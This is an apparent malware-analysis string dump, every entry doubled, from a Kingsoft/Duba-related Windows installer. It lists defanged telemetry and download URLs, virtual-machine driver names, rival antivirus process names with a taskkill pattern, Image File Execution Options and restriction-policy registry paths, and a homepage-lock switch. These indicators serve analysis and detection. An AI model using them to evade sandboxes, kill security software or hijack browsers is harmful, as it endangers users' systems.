union_server1=hXXp://union.infoc.duba.net/nep/v1/
union_server1=hXXp://union.infoc.duba.net/nep/v1/
union_server2=hXXp://union.infoc.duba.net/nep/v1/
union_server2=hXXp://union.infoc.duba.net/nep/v1/
union_server%d
union_server%d
helpunion0.ksmobile.com/nep/v1/
helpunion0.ksmobile.com/nep/v1/
.datx
.datx
x.dat
x.dat
system32\DRIVERS\viostor.sys
system32\DRIVERS\viostor.sys
vmusrvc.exe
vmusrvc.exe
system32\DRIVERS\vpcubus.sys
system32\DRIVERS\vpcubus.sys
system32\DRIVERS\vpcgbus.sys
system32\DRIVERS\vpcgbus.sys
system32\DRIVERS\vpc-s3.sys
system32\DRIVERS\vpc-s3.sys
System32\vpc-s3.dll
System32\vpc-s3.dll
P#{ad498944-762f-11d0-8dcb-00c04fc3358c}
P#{ad498944-762f-11d0-8dcb-00c04fc3358c}
ddddddd
ddddddd
hg.dat
hg.dat
QQPCRTP
QQPCRTP
QQPCTray.exe
QQPCTray.exe
%d Byte
%d Byte
%d KB
%d KB
\\.\PHYSICALDRIVE0
\\.\PHYSICALDRIVE0
%SYSTEM%
%SYSTEM%
%WINDOWS%
%WINDOWS%
%CUR_DIR%
%CUR_DIR%
instSubKeyName
instSubKeyName
instRootKey
instRootKey
%d-%x-%x-%x.ich
%d-%x-%x-%x.ich
rcmdid
rcmdid
hXXp://did.ijinshan.com/db/
hXXp://did.ijinshan.com/db/
%d-%d-%d %d:%d:%d
%d-%d-%d %d:%d:%d
data\kunioncfg.dat
data\kunioncfg.dat
\\.\Pipe\
\\.\Pipe\
SYSTEM\CurrentControlSet\services\%s
SYSTEM\CurrentControlSet\services\%s
"%s" %s
"%s" %s
Psapi.dll
Psapi.dll
/pid %d /f
/pid %d /f
taskkill.exe
taskkill.exe
%s%s_d_%x
%s%s_d_%x
\\.\KAVBase
\\.\KAVBase
system32\drivers\KAVBase.sys
system32\drivers\KAVBase.sys
Kernel32.dll
Kernel32.dll
kavsetup.log
kavsetup.log
{9B7A98EC-7EF9-468c-ACC8-37C793DBD7E0}
{9B7A98EC-7EF9-468c-ACC8-37C793DBD7E0}
KANSvr.EXE
KANSvr.EXE
iexplore.exe
iexplore.exe
360sd.exe
360sd.exe
360rps.exe
360rps.exe
kavmenu.dll
kavmenu.dll
ksoft.xml
ksoft.xml
hXXp://VVV.baidu.com
hXXp://VVV.baidu.com
2012.sp3.0
2012.sp3.0
2012.3.0
2012.3.0
LdTermDaemon.exe
LdTermDaemon.exe
\LdTerm.exe
\LdTerm.exe
\LdxManager.exe
\LdxManager.exe
dinstalltimecfg.dat
dinstalltimecfg.dat
%s\%s.lnk
%s\%s.lnk
VVV.duba.com
VVV.duba.com
hXXp://VVV.duba.com
hXXp://VVV.duba.com
%s\kingsoft%x%s
%s\kingsoft%x%s
%s\*.*
%s\*.*
HTTP/1.1
HTTP/1.1
Host: %s:%d
Host: %s:%d
Content-Length: %d
Content-Length: %d
ChXXp://ct.duba.net/itid
ChXXp://ct.duba.net/itid
360Safe.exe
360Safe.exe
360Tray.exe
360Tray.exe
InstallDK.ini
InstallDK.ini
FileName%d
FileName%d
BakFile:%s, OriFile:%s, ErrCode:%d, DuiKang:%d
BakFile:%s, OriFile:%s, ErrCode:%d, DuiKang:%d
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\360
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\360
HookPort
HookPort
ksetupwiz.exe
ksetupwiz.exe
security\ksde\kisknl64.sys
security\ksde\kisknl64.sys
security\kavbootc64.sys
security\kavbootc64.sys
security\kxescan\kdhacker64.sys
security\kxescan\kdhacker64.sys
security\kxescan\kdhacker.sys
security\kxescan\kdhacker.sys
security\kxescan\bc.sys
security\kxescan\bc.sys
ksapi.sys
ksapi.sys
security\ksde\kisknl.sys
security\ksde\kisknl.sys
security\kavbootc.sys
security\kavbootc.sys
\5.png
\5.png
\4.png
\4.png
\3.jpg
\3.jpg
\2.jpg
\2.jpg
\1.jpg
\1.jpg
kwstray.exe
kwstray.exe
kswbc.dll
kswbc.dll
kwsui.dll
kwsui.dll
kswebshield.exe
kswebshield.exe
kswebshield.dll
kswebshield.dll
KWSMain.exe
KWSMain.exe
kwssp.dll
kwssp.dll
data\ghostver.dat
data\ghostver.dat
%d:%d:%d:%d:%d
%d:%d:%d:%d:%d
SYSTEM\CurrentControlSet\services\Kingsoft Antivirus WebShield Service
SYSTEM\CurrentControlSet\services\Kingsoft Antivirus WebShield Service
hXXp://did.ijinshan.com/db/?v=2&p=%s&u=%s&m=%s&ip=%d&s=%s
hXXp://did.ijinshan.com/db/?v=2&p=%s&u=%s&m=%s&ip=%d&s=%s
hXXp://infoc0.duba.net/c/
hXXp://infoc0.duba.net/c/
ws2_32.dll
ws2_32.dll
kxetray.exe.manifest
kxetray.exe.manifest
kxescore.exe.manifest
kxescore.exe.manifest
%s_%d
%s_%d
KFixManifest::Delete Folder %s Error(%d)!
KFixManifest::Delete Folder %s Error(%d)!
KFixManifest::Delete File %s Error(%d)!
KFixManifest::Delete File %s Error(%d)!
setup.xml
setup.xml
{34115DF9-B9DE-49d2-A0B0-AF60FE6EF9D2}
{34115DF9-B9DE-49d2-A0B0-AF60FE6EF9D2}
.product.xml
.product.xml
KSafe.exe
KSafe.exe
KSafeSvc.exe
KSafeSvc.exe
QQPCMgr.exe
QQPCMgr.exe
QQPCRTP.exe
QQPCRTP.exe
TSSysKit.sys
TSSysKit.sys
d~%x\
d~%x\
kdrvmgr.exe
kdrvmgr.exe
uni0nst.exe
uni0nst.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Kingsoft Internet Security
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Kingsoft Internet Security
hXXp://VVV.ijinshan.com
hXXp://VVV.ijinshan.com
URLInfoAbout
URLInfoAbout
kismain.exe
kismain.exe
hXXp://download.duba.net/2011/lf/detect360.ini
hXXp://download.duba.net/2011/lf/detect360.ini
ksregbackup.reg
ksregbackup.reg
hXXp://cu003.VVV.duba.net/duba/tools/dubatools/usb/sysfixkill.exe
hXXp://cu003.VVV.duba.net/duba/tools/dubatools/usb/sysfixkill.exe
hXXp://bbs.duba.net/thread-22796291-1-1.html
hXXp://bbs.duba.net/thread-22796291-1-1.html
Ekingsoft_antivirus_test%d
Ekingsoft_antivirus_test%d
regedit.exe
regedit.exe
HKEY_USERS
HKEY_USERS
HKEY_LOCAL_MACHINE
HKEY_LOCAL_MACHINE
HKEY_CURRENT_USER
HKEY_CURRENT_USER
HKEY_CLASSES_ROOT
HKEY_CLASSES_ROOT
baidubrowser.exe
baidubrowser.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\BaiduBrowser
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\BaiduBrowser
ntdll.dll
ntdll.dll
ntoskrnl.exe
ntoskrnl.exe
okernel32.dll
okernel32.dll
DHKEY_CURRENT_CONFIG
DHKEY_CURRENT_CONFIG
HKEY_DYN_DATA
HKEY_DYN_DATA
HKEY_PERFORMANCE_DATA
HKEY_PERFORMANCE_DATA
{677B9715-5692-49f6-979F-CD11EC963EFE}
{677B9715-5692-49f6-979F-CD11EC963EFE}
kresult.log
kresult.log
{C16A0C4F-108B-4580-A7A0-8DEF25D2E9EF}
{C16A0C4F-108B-4580-A7A0-8DEF25D2E9EF}
Global\{E02A6D98-80B3-4a54-89E3-116EB96D0664}_EXIST
Global\{E02A6D98-80B3-4a54-89E3-116EB96D0664}_EXIST
{35CCA0CB-F603-4a28-A436-CF5F47A68DFD}
{35CCA0CB-F603-4a28-A436-CF5F47A68DFD}
Doperation\cas\kinfoc.dll
Doperation\cas\kinfoc.dll
kinfoc.dll
kinfoc.dll
2C14B686-5925-45e2-A3AA-12F87FAE181C
2C14B686-5925-45e2-A3AA-12F87FAE181C
/aurl:
/aurl:
Internet Explorer\iexplore.exe
Internet Explorer\iexplore.exe
Advapi32.dll
Advapi32.dll
from=1&ver=0.3&errcode=%d
from=1&ver=0.3&errcode=%d
cmdline
cmdline
explorer.exe
explorer.exe
avrepair.xml
avrepair.xml
{dda3f824-d8cb-441b-834d-be2efd2c1a33}
{dda3f824-d8cb-441b-834d-be2efd2c1a33}
SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths
SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths
KBigFile.exe
KBigFile.exe
perfopt.exeksafe.exe
perfopt.exeksafe.exe
netmon.exe
netmon.exe
ksafetray.exe
ksafetray.exe
ksafesvc.exe
ksafesvc.exe
hXXp://VVV.duba.com/
hXXp://VVV.duba.com/
hXXp://
hXXp://
http:\\
http:\\
qq.com
qq.com
.qq.com
.qq.com
123.duba.net
123.duba.net
hXXp://VVV.duba.com/?un%s_%s
hXXp://VVV.duba.com/?un%s_%s
BaiduPlayerRcmdInstDuba
BaiduPlayerRcmdInstDuba
/lockpage3rd:hXXp://VVV.duba.com/?un%s_%s
/lockpage3rd:hXXp://VVV.duba.com/?un%s_%s
PSAPI.DLL
PSAPI.DLL
Global\BFD88F2D-0990-4de4-AD0F-764F5894389A-%d
Global\BFD88F2D-0990-4de4-AD0F-764F5894389A-%d
hXXp://bbs.duba.net/thread-22681423-1-1.html
hXXp://bbs.duba.net/thread-22681423-1-1.html
http\shell\open\command
http\shell\open\command
\iexplore.exe
\iexplore.exe
Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.html\UserChoice
Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.html\UserChoice
IE.AssocFile.HTM
IE.AssocFile.HTM
Dkavsetup_99_1.exe
Dkavsetup_99_1.exe
hXXp://cd001.VVV.duba.net/duba/install/2013/ever/kavsetup_99_1.exe
hXXp://cd001.VVV.duba.net/duba/install/2013/ever/kavsetup_99_1.exe
hXXp://VVV.ijinshan.com/
hXXp://VVV.ijinshan.com/
{ d d d d }
{ d d d d }
nTotalScroll=%d, nScolled=%d, bAdd=%d, nChange=%d
nTotalScroll=%d, nScolled=%d, bAdd=%d, nChange=%d
dbkmsgwnd
dbkmsgwnd
TimerScroll:before:m_bkTimerScroll=%s
TimerScroll:before:m_bkTimerScroll=%s
TimerScroll:end:m_bkTimerScroll=%s
TimerScroll:end:m_bkTimerScroll=%s
shoujikong.exe
shoujikong.exe
kphonetray.exe
kphonetray.exe
filemgr.dll
filemgr.dll
appmgr.dll
appmgr.dll
data\operation_contact.dat
data\operation_contact.dat
hXXp://wpa.b.qq.com/cgi/wpa.php?ln=1&key=XzgwMDA0MjEwMF8yMzc1NzlfODAwMDQyMTAwXzJf
hXXp://wpa.b.qq.com/cgi/wpa.php?ln=1&key=XzgwMDA0MjEwMF8yMzc1NzlfODAwMDQyMTAwXzJf
liebao.exe
liebao.exe
LBBrowser\liebao.exe
LBBrowser\liebao.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\liebao
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\liebao
InstallExe
InstallExe
%d-%d-%d
%d-%d-%d
hXXp://sighttp.qq.com/authd?IDKEY=4a05d1131c1eec69db5a99c1452ee9869a1af0ced4fc9956
hXXp://sighttp.qq.com/authd?IDKEY=4a05d1131c1eec69db5a99c1452ee9869a1af0ced4fc9956
hXXp://bbs.duba.net/thread-22672832-1-1.html
hXXp://bbs.duba.net/thread-22672832-1-1.html
hXXp://VVV.ijinshan.com/protocol/dubaUserLicense.shtml
hXXp://VVV.ijinshan.com/protocol/dubaUserLicense.shtml
FhXXp://download.duba.net/2011/lf/duba_uninstall_warn_descript8.xml
FhXXp://download.duba.net/2011/lf/duba_uninstall_warn_descript8.xml
hXXp://download.duba.net/2011/lf/duba_uninstall_warn_tip8.png
hXXp://download.duba.net/2011/lf/duba_uninstall_warn_tip8.png
warntype=%d&click=%d
warntype=%d&click=%d
\ux
\ux
Fkvipcore.dll
Fkvipcore.dll
passport
passport
s%s_d_%x
s%s_d_%x
kisknl64.sys
kisknl64.sys
kisknl.sys
kisknl.sys
%s\%d-%x-%x-%x.ich
%s\%d-%x-%x-%x.ich
.hXXp://infoc2.duba.net/c/
.hXXp://infoc2.duba.net/c/
hXXp://tj.union.ijinshan.com/c/
hXXp://tj.union.ijinshan.com/c/
-unionid=%s
-unionid=%s
"%s%s" -autorun
"%s%s" -autorun
%s_%s
%s_%s
RightKeyKillVirusMenu
RightKeyKillVirusMenu
RightKeyDeleteFileMenu
RightKeyDeleteFileMenu
desktop.ini
desktop.ini
d[.ShellClassInfo]
d[.ShellClassInfo]
IconFile=kxetray.exe
IconFile=kxetray.exe
dscom.dll
dscom.dll
dinstall.xml
dinstall.xml
clear.xml
clear.xml
H\winhttp.dll
H\winhttp.dll
HTTP/1.1
HTTP/1.1
\wbem\wuapiget.dll
\wbem\wuapiget.dll
\wbem\localun.dll
\wbem\localun.dll
\wbem\keysmgr.dll
\wbem\keysmgr.dll
\wbem\wuapier.sys
\wbem\wuapier.sys
c_999223.dat
c_999223.dat
%Program Files%\Amd495Sbses53
%Program Files%\Amd495Sbses53
%Program Files%\Admin704Win
%Program Files%\Admin704Win
%Program Files%\AdminWin
%Program Files%\AdminWin
%Program Files%\AdminLive
%Program Files%\AdminLive
%Program Files%\AdminMgr
%Program Files%\AdminMgr
calcengine.dat
calcengine.dat
calcengine.dll
calcengine.dll
\drivers\npfs139.sys
\drivers\npfs139.sys
kpopserver.exe
kpopserver.exe
krepair.exe
krepair.exe
kabaload.exe
kabaload.exe
KASMain.exe
KASMain.exe
KASTask.exe
KASTask.exe
KAVDX.exe
KAVDX.exe
KAV32.exe
KAV32.exe
KAVPFW.exe
KAVPFW.exe
KAVSetup.exe
KAVSetup.exe
KAVStart.exe
KAVStart.exe
killhidepid.exe
killhidepid.exe
KISLnchr.exe
KISLnchr.exe
kissvc.exe
kissvc.exe
KMailMon.exe
KMailMon.exe
KMFilter.exe
KMFilter.exe
KPFWSvc.exe
KPFWSvc.exe
krnl360svc.exe
krnl360svc.exe
KsLoader.exe
KsLoader.exe
KVSrvXP.exe
KVSrvXP.exe
kvupload.exe
kvupload.exe
kvwsc.exe
kvwsc.exe
KvXP_1.kxp
KvXP_1.kxp
KWatch.exe
KWatch.exe
KWatch9x.exe
KWatch9x.exe
KWatchX.exe
KWatchX.exe
KSafeTray.exe
KSafeTray.exe
upsvc.exe
upsvc.exe
kislive.exe
kislive.exe
KWSUpd.exe
KWSUpd.exe
kwsmain.exe
kwsmain.exe
KSWebShield.exe
KSWebShield.exe
uniuwiz.exe
uniuwiz.exe
ksmsvc.exe
ksmsvc.exe
ksmgui.exe
ksmgui.exe
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
\????????.sys
\????????.sys
xxxxxxxx.sys
xxxxxxxx.sys
%System%\drivers\p2phook.sys
%System%\drivers\p2phook.sys
%System%\drivers\nthook.sys
%System%\drivers\nthook.sys
%System%\drivers\nhook.sys
%System%\drivers\nhook.sys
%System%\drivers\persist.sys
%System%\drivers\persist.sys
%System%\uspx.dll
%System%\uspx.dll
%System%\safemon.dll
%System%\safemon.dll
%System%\ups.dll
%System%\ups.dll
%System%\drivers\beep.sys
%System%\drivers\beep.sys
A707-22d2-9CBD-0000F87A469H}
A707-22d2-9CBD-0000F87A469H}
%Program Files%\Common Files\Microsoft Shared\INK\
%Program Files%\Common Files\Microsoft Shared\INK\
%WinDir%\conime\SSDT01.SYS
%WinDir%\conime\SSDT01.SYS
\*.sys
\*.sys
%Program Files%\AdminMgr\vmqutr.sys
%Program Files%\AdminMgr\vmqutr.sys
%Program Files%\AdminMgr\vmqutr.dll
%Program Files%\AdminMgr\vmqutr.dll
%Program Files%\AdminLive\vbcdtr.sys
%Program Files%\AdminLive\vbcdtr.sys
%Program Files%\AdminLive\vbcdtr.dll
%Program Files%\AdminLive\vbcdtr.dll
2345SafeTray.exe
2345SafeTray.exe
2345Service.exe
2345Service.exe
deepscan\zhudongfangyu.exe
deepscan\zhudongfangyu.exe
EfiMon.sys
EfiMon.sys
%Program Files%\360\360Safe\
%Program Files%\360\360Safe\
%Program Files% (x86)\360\360Safe\
%Program Files% (x86)\360\360Safe\
%s*.*
%s*.*
%s%s\
%s%s\
ksafe.exe
ksafe.exe
ksfmon.dll
ksfmon.dll
shoujizhushou.exe
shoujizhushou.exe
kmobiletray.dll
kmobiletray.dll
rstray.exe
rstray.exe
rsmain.exe
rsmain.exe
ravmond.exe
ravmond.exe
\\.\PhysicalDrive0
\\.\PhysicalDrive0
\\.\Scsi0
\\.\Scsi0
System\CurrentControlSet\Control\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}
System\CurrentControlSet\Control\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}
D:\dream\duba_u20862342_sv1_3_18.exe
D:\dream\duba_u20862342_sv1_3_18.exe